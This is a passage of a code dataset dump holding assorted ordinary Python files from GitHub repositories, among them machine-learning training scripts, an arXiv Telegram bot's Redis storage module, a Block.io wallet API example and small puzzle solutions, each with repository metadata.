f\"/{str(epoch).zfill(3)}.{batch_idx}_gen.png\")\n torchvision.utils.save_image(data * 0.5 + 0.5, folder + f\"/{str(epoch).zfill(3)}.{batch_idx}_0in.png\")\n loop.set_postfix(loss=loss.item())\n return val_loss / len(loader)\n\ndef main():\n dis = Discriminator(in_channels=CHANNELS_IMG).to(DEVICE)\n gen = Generator(in_channels=CHANNELS_IMG).to(DEVICE)\n opt_dis = optim.Adam(dis.parameters(), lr=LEARNING_RATE, betas=(0.5, 0.999))\n opt_gen = 
optim.Adam(gen.parameters(), lr=LEARNING_RATE, betas=(0.5, 0.999))\n criterion_1 = nn.BCEWithLogitsLoss()\n criterion_2 = nn.L1Loss()\n\n if LOAD_MODEL:\n load_checkpoint(torch.load(CHECKPOINT_GEN), gen, opt_gen, DEVICE)\n load_checkpoint(torch.load(CHECKPOINT_DISC), dis, opt_dis, DEVICE)\n \n train_dataset = ImageDataset(root_dir=TRAIN_DIR)\n val_dataset = ImageDataset(root_dir=VAL_DIR)\n train_loader = DataLoader(train_dataset, batch_size=BATCH_SIZE, shuffle=True, num_workers=NUM_WORKERS)\n val_loader = DataLoader(val_dataset, batch_size=1, shuffle=False, num_workers=NUM_WORKERS)\n\n plotter = Plotter()\n\n for epoch in range(NUM_EPOCHS):\n train_loss = train_fn(epoch, train_loader, dis, gen, opt_dis, opt_gen, criterion_1, criterion_2)\n if SAVE_MODEL:\n checkpoint = {\n \"state_dict\": gen.state_dict(),\n \"optimizer\": opt_gen.state_dict(),\n }\n save_checkpoint(checkpoint, filename=CHECKPOINT_GEN)\n checkpoint = {\n \"state_dict\": dis.state_dict(),\n \"optimizer\": opt_dis.state_dict(),\n }\n save_checkpoint(checkpoint, filename=CHECKPOINT_DISC)\n test_loss = valid_fn(epoch, val_loader, gen, criterion_1)\n print(f\"Epoch: {epoch} || Train Loss: {train_loss:.4f} || Test Loss: {test_loss:.4f}\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"bresilla/papers_with_code","sub_path":"pix2pix/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13681150602","text":"import pyfiglet\nfrom param_tennis import Param\nfrom main.train import Train\nimport argparse\n\ndef gridsearch(csv):\n props = {'learning_rate': 1e-6, 'epochs': 100, 'batch_size': 32, 'optimizer': 'adam',\n 'momentum': 0.9, 'nesterov': True}\n batch_sizes = [32, 128, 256, 512]\n lrs = [1e-5, 1e-6]\n optimizers = ['sgd', 'adam', 'adamw']\n for optimizer in optimizers:\n for lr in lrs:\n for batch_size in batch_sizes:\n props['learning_rate'] = lr\n props['batch_size'] = batch_size\n props['optimizer'] = optimizer\n p = Param(props)\n Tr = Train(csv, p)\n Tr.train()\n\n\nif __name__ == '__main__':\n result = pyfiglet.figlet_format(\"Tennis Gridsearch Training\", font=\"slant\")\n csv = r'D:\\Data\\Sports\\tennis\\tennis_data\\atp_database.csv'\n parser = argparse.ArgumentParser()\n parser.add_argument('--csv', default=csv, help='CSV Data for gridsearch. 
')\n args = parser.parse_args()\n print(args)\n gridsearch(args.csv)\n","repo_name":"jdlamstein/tennispredictor","sub_path":"main/gridsearch.py","file_name":"gridsearch.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39904214722","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nArxiv Telegram Bot - Redis Instance\n\nContains all methods related to storing and fetching user data using redis instance\n\"\"\"\n\nimport arxiv\nimport datetime\nimport pytz\nimport re\nimport redis\nimport pickle\nimport os\nimport dotenv\nfrom urllib.parse import urlparse\nimport logging\n\nfrom telegram.ext import CallbackContext\n\ndotenv.load_dotenv()\nurl = urlparse(os.environ.get(\"REDIS_URL\"))\nr = redis.StrictRedis(\n host=url.hostname,\n port=url.port,\n username=\"\",\n password=os.environ.get(\"REDIS_PASSWORD\"),\n)\n\n\ndef add_user(chat_id):\n \"\"\"store user chat id\"\"\"\n if r.get(\"Users\"):\n users = pickle.loads(r.get(\"Users\"))\n users.add(chat_id)\n r.set(\"Users\", pickle.dumps(users))\n else:\n users = set([chat_id])\n r.set(\"Users\", pickle.dumps(users))\n\n\ndef get_users():\n \"\"\"get stored user chat ids\"\"\"\n if r.get(\"Users\"):\n return pickle.loads(r.get(\"Users\"))\n else:\n return set([])\n\n\ndef add_user_preferences(chat_id, category, response):\n \"\"\"store/cache chat_id and user_preferences\"\"\"\n if r.get(chat_id):\n catalogue = pickle.loads(r.get(chat_id))\n if catalogue.get(category):\n catalogue[category].add(response)\n else:\n catalogue[category] = set([response])\n r.set(chat_id, pickle.dumps(catalogue))\n else:\n catalogue = {category: set([response])}\n r.set(chat_id, pickle.dumps(catalogue))\n\n return \"User Added\"\n\n\ndef remove_user_preferences(chat_id, category, response):\n \"\"\"remove chat_id and user_preferences\"\"\"\n catalogue = pickle.loads(r.get(chat_id))\n catalogue[category].remove(response)\n if catalogue[category]:\n r.set(chat_id, pickle.dumps(catalogue))\n else:\n del catalogue[category]\n if catalogue:\n r.set(chat_id, pickle.dumps(catalogue))\n else:\n r.delete(chat_id)\n return \"Topic Removed\"\n\n\ndef get_user_preferences(chat_id, context: CallbackContext):\n \"\"\"fetch cached user preferences for chat_id\"\"\"\n if r.get(chat_id):\n catalogue = pickle.loads(r.get(chat_id))\n context.user_data[\"CURRENT_PREFERENCES\"] = catalogue\n return context.user_data[\"CURRENT_PREFERENCES\"]\n return []\n\n\ndef store_update_time():\n r.set(\"Time\", pickle.dumps(datetime.datetime.now()))\n\n\ndef get_update_time():\n if r.get(\"Time\"):\n return pickle.loads(r.get(\"Time\"))\n\n\ndef store_paper_update(category, topics):\n \"\"\"store latest papers for each category\"\"\"\n Category = {}\n for topic in topics.items():\n search = arxiv.Search(\n query=topic[1],\n max_results=1,\n sort_by=arxiv.SortCriterion.SubmittedDate,\n sort_order=arxiv.SortOrder.Descending,\n )\n\n result = search.results().__next__()\n setTime = datetime.datetime.now()\n setTime = setTime.replace(tzinfo=pytz.utc)\n setTime = setTime - datetime.timedelta(hours=12)\n if result.published > setTime:\n paper_dict = {}\n\n title = format_content(result.title)\n paper_dict[\"title\"] = title\n\n date = format_content(str(result.published).split()[0])\n paper_dict[\"date\"] = date\n\n summary = format_content(result.summary)\n summary = summary.replace(\"\\n\", \" \")\n paper_dict[\"summary\"] = summary\n\n categories = format_content(\", 
\".join(result.categories))\n paper_dict[\"categories\"] = categories\n\n abs_url = [str(link) for link in result.links if \"abs\" in str(link)][0]\n abs_url = format_content(re.sub(r\"v\\d+\\b\", \"\", abs_url))\n paper_dict[\"abs_url\"] = abs_url\n\n pdf_url = [str(link) for link in result.links if \"pdf\" in str(link)][0]\n pdf_url = format_content(re.sub(r\"v\\d+\\b\", \"\", pdf_url))\n paper_dict[\"pdf_url\"] = pdf_url\n\n try:\n Category = pickle.loads(r.get(category))\n Category[topic[1]] = paper_dict\n # Only supports one paper right now\n r.set(category, pickle.dumps(Category))\n except:\n r.delete(category)\n Category[topic[1]] = paper_dict\n # Only supports one paper right now\n r.set(category, pickle.dumps(Category))\n\n\ndef get_stored_paper(category, topicCode):\n if r.get(category):\n category = pickle.loads(r.get(category))\n if topicCode in category:\n return category[topicCode]\n else:\n return None\n\n\ndef format_content(content):\n escaper = re.compile(r\"(\\W)\")\n return escaper.sub(r\"\\\\\\1\", content)\n\n\nif __name__ == \"__main__\":\n print(add_user_preferences({}))\n print(get_user_preferences({}))\n print(remove_user_preferences({}))\n print(get_stored_paper({}))\n","repo_name":"sonaalPradeep/arxiv-telegram-bot","sub_path":"arxiv_telegram_bot/functions/store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":4868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8611092466","text":"# Basic example for using Block.io for generating wallet addresses and withdrawing coins\n\nfrom block_io import BlockIo\nfrom decimal import *\nimport os\nimport random\nimport sys\nimport json\n\nversion = 2 # API version\n\n# use a testnet api key here, say, dogecoin\nblock_io = BlockIo(os.environ.get('BLOCK_IO_API_KEY'), os.environ.get('BLOCK_IO_PIN'), version)\n\n# create a new address with a random label\naddress_label = 'tlabel'+str(int(random.random()*10000))\n\nnew_address = None\n\ntry:\n new_address = block_io.get_new_address(label=address_label)['data']['address']\nexcept Exception:\n exc = sys.exc_info()[1]\n print(exc)\n\nif (new_address is None):\n # the address label already existed, let's get the associated address\n new_address = block_io.get_address_by_label(label=address_label)['data']['address']\n\nprint(\"Address Generated for Label=\",address_label,\":\",new_address)\n\n# get address balance\navailable_balance = Decimal('0.0')\ntry:\n response = block_io.get_address_balance(label=address_label)\n available_balance = Decimal(response['data']['available_balance'])\n network = response['data']['network']\n print(\"Available Balance in Label=\",address_label,\":\",format(available_balance,'.8f'),network)\nexcept Exception:\n exc = sys.exc_info()[1]\n print(exc)\n\n# get total balance on the account\ntry:\n response = block_io.get_balance()\n available_balance = Decimal(response['data']['available_balance'])\n network = response['data']['network']\n print(\"Total Balance in Account=\",format(available_balance,'.8f'),network)\nexcept Exception:\n exc = sys.exc_info()[1]\n print(exc)\n\n# send 1% of the coins in our account to our new label's address\ntry:\n amount_to_send = Decimal(0.01) * available_balance\n print(\"Sending Coins=\",format(amount_to_send,'.8f'),\"to Label=\",address_label)\n\n # prepare the transaction\n prepared_transaction = block_io.prepare_transaction(to_label=address_label, amount=format(amount_to_send, '.8f'))\n\n # review its response\n # for in-depth information about 
the transaction you will create, look at the prepared_transaction object directly\n print(json.dumps(block_io.summarize_prepared_transaction(prepared_transaction)))\n\n # once satisfied, create the transaction and sign it\n created_transaction_and_signatures = block_io.create_and_sign_transaction(prepared_transaction)\n\n # inspect the transaction_data (particularly the tx_hex) to ensure it is what you wanted\n # once satisfied, submit the transaction to Block.io for its signature + broadcast to the peer-to-peer network\n response = block_io.submit_transaction(transaction_data=created_transaction_and_signatures)\n \n print(\"Coins sent. Transaction ID=\", response['data']['txid'])\nexcept Exception:\n exc = sys.exc_info()[1]\n print(exc)\n\n# get the new balance on our new address\ntry:\n response = block_io.get_address_balance(label=address_label)\n available_balance = Decimal(response['data']['available_balance'])\n network = response['data']['network']\n \n print(\"New Balance in Label=\",address_label+\":\",format(available_balance,'.8f'),network)\nexcept Exception:\n exc = sys.exc_info()[1]\n print(exc)\n\n# end :)\n","repo_name":"BlockIo/block_io-python","sub_path":"examples/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":3197,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"61"} +{"seq_id":"23429508911","text":"file = open('B-large.in', mode = 'r')\noutfile = open('output.out', mode = 'w')\nn = int(file.readline()[:-1])\nresult = []\nfor k in range(n):\n data = file.readline()[:-1].split(' ')\n c = float(data[0])\n f = float(data[1])\n x = float(data[2])\n i = 0\n s = 0\n cur = x/2\n prev = x\n while cur < prev:\n s = s + c/(2+i*f)\n prev = cur\n cur = s + x/(2+(i+1)*f)\n i += 1\n result.append(prev)\n\nfor i in range(n):\n outfile.write('Case #'+str(i+1)+': '+str(result[i])+'\\n')\n\nfile.close()\noutfile.close()\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_136/765.py","file_name":"765.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3610253284","text":"import random\nimport numpy as np\n\nimport tensorflow as tf\nfrom keras.utils import to_categorical\n\nimport json, time\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nfrom utils import *\nfrom data_gen import *\nfrom model2 import *\n\ntf.logging.set_verbosity(tf.logging.INFO)\nFLAGS = tf.app.flags.FLAGS\n\n\n\ndef evaluate_model(sess, model, data_set):\n \"\"\"Returns the average cost over the data set.\"\"\"\n total_cost = 0.0\n total_pd = 0.0\n total_ps = 0.0\n for batch in range(data_set.num_batches):\n\n unused_orig_x, x, s,index_chars = data_set.random_batch()\n\n feed = {model.input_data: x,\n model.sequence_lengths: s,\n model.index_chars: index_chars,\n model.initial_state: np.zeros([args.max_seq_len, args.out_dim + args.hidden_size]),\n }\n\n\n [cost,pd,ps] = sess.run([model.cost,model.Pd, model.Ps], feed)\n total_cost += cost\n total_pd += pd\n total_ps += ps\n \n \n total_pd /= (data_set.num_batches)\n total_ps /= (data_set.num_batches)\n total_cost /= (data_set.num_batches)\n\n print('Pd: ' + str(total_pd))\n print('Ps: ' + str(total_ps))\n\n \n return total_cost\n\ndef train(sess, model, eval_model, train_set, valid_set, test_set,args):\n summary_writer = tf.summary.FileWriter(FLAGS.log_root)\n\n # Calculate trainable params.\n t_vars = 
tf.trainable_variables()\n count_t_vars = 0\n for var in t_vars:\n num_param = np.prod(var.get_shape().as_list())\n count_t_vars += num_param\n tf.logging.info('%s %s %i', var.name, str(var.get_shape()), num_param)\n tf.logging.info('Total trainable variables %i.', count_t_vars)\n model_summ = tf.summary.Summary()\n model_summ.value.add(\n tag='Num_Trainable_Params', simple_value=float(count_t_vars))\n summary_writer.add_summary(model_summ, 0)\n summary_writer.flush()\n\n # setup eval stats\n best_valid_cost = 10000000000000.0 # set a large init value\n valid_cost = 0.0\n\n # main train loop\n embedding_init = sess.run(model.embedding_matrix, feed_dict={})\n\n start = time.time()\n\n #train_writer = tf.summary.FileWriter('logs', sess.graph)\n\n for _ in range(args.num_epochs):\n\n step = sess.run(model.global_step)\n\n #merge = tf.summary.merge_all()\n\n curr_learning_rate = ((args.learning_rate - args.min_learning_rate) *\n (args.decay_rate) ** step + args.min_learning_rate)\n\n _, x, s, index_chars = train_set.random_batch()\n\n feed = {\n model.input_data: x,\n model.sequence_lengths: s,\n model.lr: curr_learning_rate,\n\n model.initial_state: np.zeros([args.max_seq_len, args.out_dim+args.hidden_size]),\n model.index_chars: index_chars\n\n }\n\n (train_cost, _, train_step, _, pd, ps) = sess.run([model.cost, model.final_state, \n model.global_step, model.train_op, \n model.Pd, model.Ps], feed)\n\n #train_writer.add_summary(summary, step)\n\n if step % (args.save_every/2) == 0 and step > 0:\n\n embedding_after = sess.run(model.embedding_matrix, feed_dict={})\n print('Change in embedding matrix: ' + str(np.sum(abs(embedding_after - embedding_init))))\n\n end = time.time()\n time_taken = end - start\n\n cost_summ = tf.summary.Summary()\n cost_summ.value.add(tag='Train_Cost', simple_value=float(train_cost))\n lr_summ = tf.summary.Summary()\n lr_summ.value.add(\n tag='Learning_Rate', simple_value=float(curr_learning_rate))\n time_summ = tf.summary.Summary()\n time_summ.value.add(\n tag='Time_Taken_Train', simple_value=float(time_taken))\n\n output_format = ('step: %d, lr: %.6f, cost: %.4f, '\n 'train_time_taken: %.4f')\n output_values = (step, curr_learning_rate, train_cost,\n time_taken)\n output_log = output_format % output_values\n\n tf.logging.info(output_log)\n\n summary_writer.add_summary(cost_summ, train_step)\n summary_writer.add_summary(lr_summ, train_step)\n summary_writer.add_summary(time_summ, train_step)\n summary_writer.flush()\n start = time.time()\n\n if step % args.save_every == 0 and step > 0:\n\n (valid_cost) = evaluate_model(sess, eval_model, valid_set)\n\n end = time.time()\n time_taken_valid = end - start\n start = time.time()\n\n valid_cost_summ = tf.summary.Summary()\n valid_cost_summ.value.add(\n tag='Valid_Cost', simple_value=float(valid_cost))\n\n valid_time_summ = tf.summary.Summary()\n valid_time_summ.value.add(\n tag='Time_Taken_Valid', simple_value=float(time_taken_valid))\n\n output_format = ('best_valid_cost: %0.4f, valid_cost: %.4f, '\n ' valid_time_taken: %.4f')\n output_values = (min(best_valid_cost, valid_cost), valid_cost,\n time_taken_valid)\n output_log = output_format % output_values\n\n tf.logging.info(output_log)\n\n summary_writer.add_summary(valid_cost_summ, train_step)\n summary_writer.add_summary(valid_time_summ, train_step)\n summary_writer.flush()\n\n if valid_cost < best_valid_cost:\n best_valid_cost = valid_cost\n\n save_model(sess, args.model_dir, step)\n\n end = time.time()\n time_taken_save = end - start\n start = time.time()\n\n 
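# a new best-validation checkpoint was just saved above; log how long the save took\n 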
tf.logging.info('time_taken_save %4.4f.', time_taken_save)\n\n best_valid_cost_summ = tf.summary.Summary()\n best_valid_cost_summ.value.add(\n tag='Best_Valid_Cost', simple_value=float(best_valid_cost))\n\n summary_writer.add_summary(best_valid_cost_summ, train_step)\n summary_writer.flush()\n\n (eval_cost) = evaluate_model(sess, eval_model, test_set)\n\n end = time.time()\n time_taken_eval = end - start\n start = time.time()\n\n eval_cost_summ = tf.summary.Summary()\n eval_cost_summ.value.add(tag='Eval_Cost', simple_value=float(eval_cost))\n eval_time_summ = tf.summary.Summary()\n eval_time_summ.value.add(\n tag='Time_Taken_Eval', simple_value=float(time_taken_eval))\n\n output_format = ('eval_cost: %.4f, '\n 'eval_time_taken: %.4f')\n output_values = (eval_cost, time_taken_eval)\n output_log = output_format % output_values\n\n tf.logging.info(output_log)\n\n summary_writer.add_summary(eval_cost_summ, train_step)\n summary_writer.add_summary(eval_time_summ, train_step)\n summary_writer.flush()\n\ndef trainer(args):\n\n # load data\n stroke_train, stroke_val, label_train, label_val, label2char, char2label, max_len,_,_ = load_data(args.data_dir, args.model_dir)\n vocabulary = len(label2char)\n\n train_set = DataLoader(stroke_train, label_train, batch_size=args.batch_size, max_seq_length=args.max_seq_len, embedding_len = args.embedding_len, vocabulary = vocabulary)\n valid_set = DataLoader(stroke_val, label_val, batch_size=args.batch_size, max_seq_length=args.max_seq_len, embedding_len = args.embedding_len, vocabulary = vocabulary)\n test_set = valid_set\n\n reset_graph()\n # load model\n model = Generation_model(args=args,vocabulary=vocabulary)\n eval_model = Generation_model(args=args, reuse=True, vocabulary=vocabulary)\n\n # start session\n sess = tf.InteractiveSession()\n sess.run(tf.global_variables_initializer())\n\n # check if resume model\n if args.is_resume:\n load_checkpoint(sess,FLAGS.log_root)\n\n train(sess, model, eval_model, train_set, valid_set, test_set, args)\n\ndef generate(args):\n # load data\n stroke_train, stroke_val, label_train, label_val, label2char, char2label, max_len, all_strokes, all_lbls = load_data(args.data_dir,\n args.model_dir)\n vocabulary = len(label2char)\n\n test_set = DataLoader(stroke_val, label_val, batch_size=args.batch_size,\n max_seq_length=args.max_seq_len, embedding_len=args.embedding_len,\n vocabulary=vocabulary)\n\n train_set = DataLoader(stroke_train, label_train, batch_size=args.batch_size,\n max_seq_length=args.max_seq_len, embedding_len=args.embedding_len,\n vocabulary=vocabulary)\n\n data_set = DataLoader(all_strokes, all_lbls, batch_size=args.batch_size,\n max_seq_length=args.max_seq_len, embedding_len=args.embedding_len,\n vocabulary=vocabulary)\n # construct the sketch-rnn model here:\n reset_graph()\n\n model = Generation_model(args=args, vocabulary=vocabulary)\n args.is_training = False\n args.batch_size = 1\n sample_model = Generation_model(args=args, reuse=True, vocabulary=vocabulary)\n\n sess = tf.InteractiveSession()\n sess.run(tf.global_variables_initializer())\n\n # print(\n #\n # \"The embedding matrix: \" + sess.run(model.embedding_matrix, feed_dict={})\n #\n # )\n\n # loads the weights from checkpoint into our model\n load_checkpoint(sess, FLAGS.log_root)\n\n index = random.randint(0, len(train_set.charlabel) - 1) # randint is inclusive on both ends\n index_char = train_set.charlabel[index]\n x = train_set.strokes[index]\n label = label2char[index_char][0]\n\n print(label)\n\n sample_strokes, m = sample(sess, sample_model, seq_len=args.max_seq_len, temperature=0.9, 
index_char = index_char, args=args)\n\n sample_strokes[:, 2] = sample_strokes[:, 3] # change because we don't input the sequence, so we don't change at the to_big_stroke\n\n strokes = to_normal_strokes(sample_strokes)\n x_strokes = to_normal_strokes(x)\n\n draw_strokes(x_strokes, svg_fpath='sample/origin_' + label + '.svg')\n draw_strokes(strokes, svg_fpath='sample/gen_' + label + '.svg')\n\n\n # line_rebuild = strokes52lines(x)\n\n # l=0\n # for i in range(len(x[0])):\n # if x[0][i, 2] > 0:\n # l += 1\n #\n #\n # plot_char(args.sample_dir,lines2pts(line_rebuild)[0][1:l], label2char.get(index_char[0],None)[0])\n #\n # # draw_strokes(to_normal_strokes(x[0]), svg_fpath='sample/origin_' + label2char.get(index_char[0],None)[0] + '.svg')\n # # 0: ve 1: nhac len\n # # for i in range(len(q)):\n # # char = label2char.get(index_char[i], None)\n # # draw_strokes(to_normal_strokes(q[i]),svg_fpath='sample/origin_'+ char[0] + '.svg')\n #\n # sample_strokes, m = sample(sess, sample_model, seq_len=args.max_seq_len, index_char = index_char[0], args = args)\n #\n #\n # l=0\n # for i in range(len(sample_strokes)):\n # if sample_strokes[i, 2] > 0:\n # l += 1\n # if l == len(sample_strokes):\n # l=0\n #\n # line_rebuild_gen = strokes52lines([sample_strokes])\n # plot_char(args.sample_dir,lines2pts(line_rebuild_gen)[0][1:l+1], label2char.get(index_char[0],None)[0])\n # print(sample_strokes)\n #strokes = to_normal_strokes(sample_strokes)\n\n #draw_strokes(strokes)\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser()\n\n # environment\n server = True\n\n if server == True:\n parser.add_argument('--data_dir', default='/mnt/DATA/lupin/Flaxscanner/Dataset/Drawing/')\n parser.add_argument('--sample_dir', default='sample/')\n parser.add_argument('--model_dir', default='/mnt/DATA/lupin/Flaxscanner/Models/Drawing/gen_model2/')\n else:\n parser.add_argument('--data_dir', default='/home/lupin/Cinnamon/Flaxscanner/Dataset/Drawing/')\n parser.add_argument('--sample_dir', default='sample/')\n parser.add_argument('--model_dir', default='/home/lupin/Cinnamon/Flaxscanner/Models/Drawing/gen_model2/')\n\n parser.add_argument('--mode', default='train', type=str)\n parser.add_argument('--num_epochs', default= 3000000, type=int)\n\n parser.add_argument('--hidden_size', default=3000, type=int)\n parser.add_argument('--learning_rate', default=1e-4, type=float)\n parser.add_argument('--min_learning_rate', default=1e-6, type=float)\n\n parser.add_argument('--grad_clip', default=1.0, type=int)\n parser.add_argument('--decay_rate', default=0.9999, type=int)\n parser.add_argument('--dropout_rate', default=0.2, type=float)\n parser.add_argument('--max_seq_len', default=60, type=int)\n parser.add_argument('--pen_dim', default=500, type=int)\n parser.add_argument('--out_dim', default=1000, type=int)\n parser.add_argument('--num_mixture', default=50, type=int)\n parser.add_argument('--embedding_len', default=70, type=int)\n parser.add_argument('--batch_size', default=64, type=int)\n parser.add_argument('--is_training', default=True, type=bool)\n parser.add_argument('--save_every', default=200, type=int)\n parser.add_argument('--num_gpu', default='3', type=int)\n parser.add_argument('--is_resume', default=False, type=bool)\n\n args = parser.parse_args()\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = str(args.num_gpu)\n\n tf.app.flags.DEFINE_string(\n 'log_root', args.model_dir,\n 'Directory to store model checkpoints, tensorboard.')\n\n if args.mode == 'train':\n trainer(args)\n\n else:\n 
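# any mode other than 'train' falls through to generation, sampling from the saved checkpoint\n 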
generate(args)","repo_name":"vankhoa21991/Drawing","sub_path":"gen_model/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13738,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"7765829905","text":"#Type casting\nfloat1 = 10.5\nint1 = int(float1)\nprint(int1)\nfloat2 = float(int1)\nprint(float2) #Guess what?\n\ntuple1 = (1,2,3)\nlist1 = list(tuple1) #Type casting to List\nprint(list1)\ntuple2 = tuple(list1)\nprint(tuple2) \n","repo_name":"sankethv/DSDec2018","sub_path":"12.TypeCasting.py","file_name":"12.TypeCasting.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"9338952668","text":"import os\nimport subprocess\n\nfrom .. import g\n\n\ndef run_process(args):\n # Echo the command we're about to run\n g.log.debug('> %s' % (args if isinstance(args, str) else ' '.join(args)))\n\n # Prepare the subprocess args, piping STDOUT and STDERR so we can capture output.\n # If running on Windows, suppress the console window that would ordinarily be spawned when running a pyinstaller-built EXE.\n kwargs = {'stdout': subprocess.PIPE, 'stderr': subprocess.STDOUT}\n if hasattr(subprocess, 'STARTUPINFO'):\n kwargs['startupinfo'] = subprocess.STARTUPINFO()\n kwargs['startupinfo'].dwFlags |= subprocess.STARTF_USESHOWWINDOW\n kwargs['stdin'] = subprocess.PIPE\n process = subprocess.Popen(args, **kwargs)\n\n with process.stdout:\n for line in iter(process.stdout.readline, b''):\n g.log.debug(line.rstrip().decode('utf-8'))\n exitcode = process.wait()\n if exitcode != 0:\n g.log.warning('exitcode: %d' % exitcode)\n return exitcode\n","repo_name":"awforsythe/fscan","sub_path":"app/core/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15655408913","text":"def create_matrix(n_lines):\n result = []\n for line in range(n_lines):\n result.append(list(int(el) for el in input().split()))\n return result\n\ndef run_command(command, matrix, valid_range):\n command_type = command.split()[0]\n row, col, value = [int(el) for el in command.split()[1:]]\n is_valid = True\n if row not in valid_range or col not in valid_range:\n is_valid = False\n else:\n if command_type == \"Add\":\n matrix[row][col] += value\n else:\n matrix[row][col] -= value\n if not is_valid:\n print(\"Invalid coordinates\")\n\ndef print_result(matrix):\n for row in matrix:\n print(*[str(el) for el in row], sep=\" \")\n\n#read input and create matrix\nrows = int(input())\nmatrix = (create_matrix(rows))\nmatrix_range = range(0, rows)\n\n#read commands\nwhile True:\n command = input()\n if command == \"END\":\n break\n else:\n run_command(command, matrix, matrix_range)\n\nprint_result(matrix)","repo_name":"geodimitrov/Python-Advanced-SoftUni","sub_path":"Comprehensions/Exercises/10. 
matrix_modification.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71442582594","text":"import csv\nimport os\nfrom datetime import datetime, date\nfrom todo_item import TodoItem\nfrom todo_quarter import TodoQuarter\n\n\nclass TodoMatrix:\n \"\"\"\n Parameters:\n ----------\n Raises:\n ----------\n \"\"\"\n\n def __init__(self):\n\n self.todo_quarters = {'IU': TodoQuarter(),\n 'IN': TodoQuarter(),\n 'NU': TodoQuarter(),\n 'NN': TodoQuarter()}\n\n\n def get_quarter(self, status):\n\n for item in self.todo_quarters.keys():\n\n if status == item:\n \n return self.todo_quarters[status]\n\n\n def add_item(self, title, deadline, is_important=False):\n\n if not isinstance(deadline, date):\n raise TypeError(\"wrong date format!\")\n\n else:\n if is_important and (deadline - datetime.today()).days <= 3:\n self.todo_quarters['IU'].add_item(title, deadline)\n elif is_important:\n self.todo_quarters['IN'].add_item(title, deadline)\n elif is_important is False and (deadline - datetime.today()).days <= 3:\n self.todo_quarters['NU'].add_item(title, deadline)\n elif is_important is False:\n self.todo_quarters['NN'].add_item(title, deadline)\n\n\n def add_items_from_file(self, file_name = 'todo_items_read_test.csv'):\n\n if not os.path.isfile(file_name):\n raise FileNotFoundError\n\n else:\n with open(file_name, 'r') as csvfile:\n spamreader = csv.reader(csvfile, delimiter='|')\n\n for row in spamreader:\n title = row[0]\n is_important = False\n if row[2]:\n is_important = True\n\n deadline = datetime.strptime(row[1]+\"-2017\", \"%d-%m-%Y\")\n self.add_item(title, deadline, is_important)\n\n\n def save_items_to_file(self, file_name = 'todo_items_save_test.csv'):\n\n\n with open(file_name, 'w') as csvfile:\n writer = csv.writer(csvfile, delimiter='|')\n\n for key, value in self.todo_quarters.items():\n for task in value.todo_items:\n # print (task)\n date = '-'.join([str(task.deadline.day), str(task.deadline.month)])\n\n if key == 'IU' or key == 'IN':\n writer.writerow([task.title, date, \"important\"])\n else:\n writer.writerow([task.title, date, \"\"])\n\n\n def archive_items(self):\n\n for key, value in self.todo_quarters.items():\n value.archive_items()\n\n\n def __str__(self):\n\n # __str__ must return a string; the original version printed and returned None\n result = ''\n for key in self.todo_quarters.keys():\n result += key + ':\\n'\n result += str(self.todo_quarters[key]) + '\\n'\n return result\n\n","repo_name":"Ziem0/Eisenhower_Matrix","sub_path":"todo_matrix.py","file_name":"todo_matrix.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40217650899","text":"def count_trees(matrix, step_x, step_y):\n x = 0\n y = 0\n nb_trees = 0\n tree_symbol = \"#\"\n while x < len(matrix):\n if (matrix[x][y % len(matrix[x])]) == tree_symbol:\n nb_trees += 1\n x += step_x\n y += step_y\n return nb_trees\n\n\nfilepath = \"inputs/day3_input.txt\"\nwith open(filepath, 'r') as f:\n m = [[s for s in line] for line in f.read().split('\\n')]\nnb11 = count_trees(m, 1, 1)\nnb13 = count_trees(m, 1, 3)\nnb15 = count_trees(m, 1, 5)\nnb17 = count_trees(m, 1, 7)\nnb21 = count_trees(m, 2, 1)\nprint(nb11)\nprint(nb13)\nprint(nb15)\nprint(nb17)\nprint(nb21)\nprint(nb11 * nb13 * nb15 * nb17 * nb21)\n","repo_name":"Dralnar/AdventCode","sub_path":"day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 
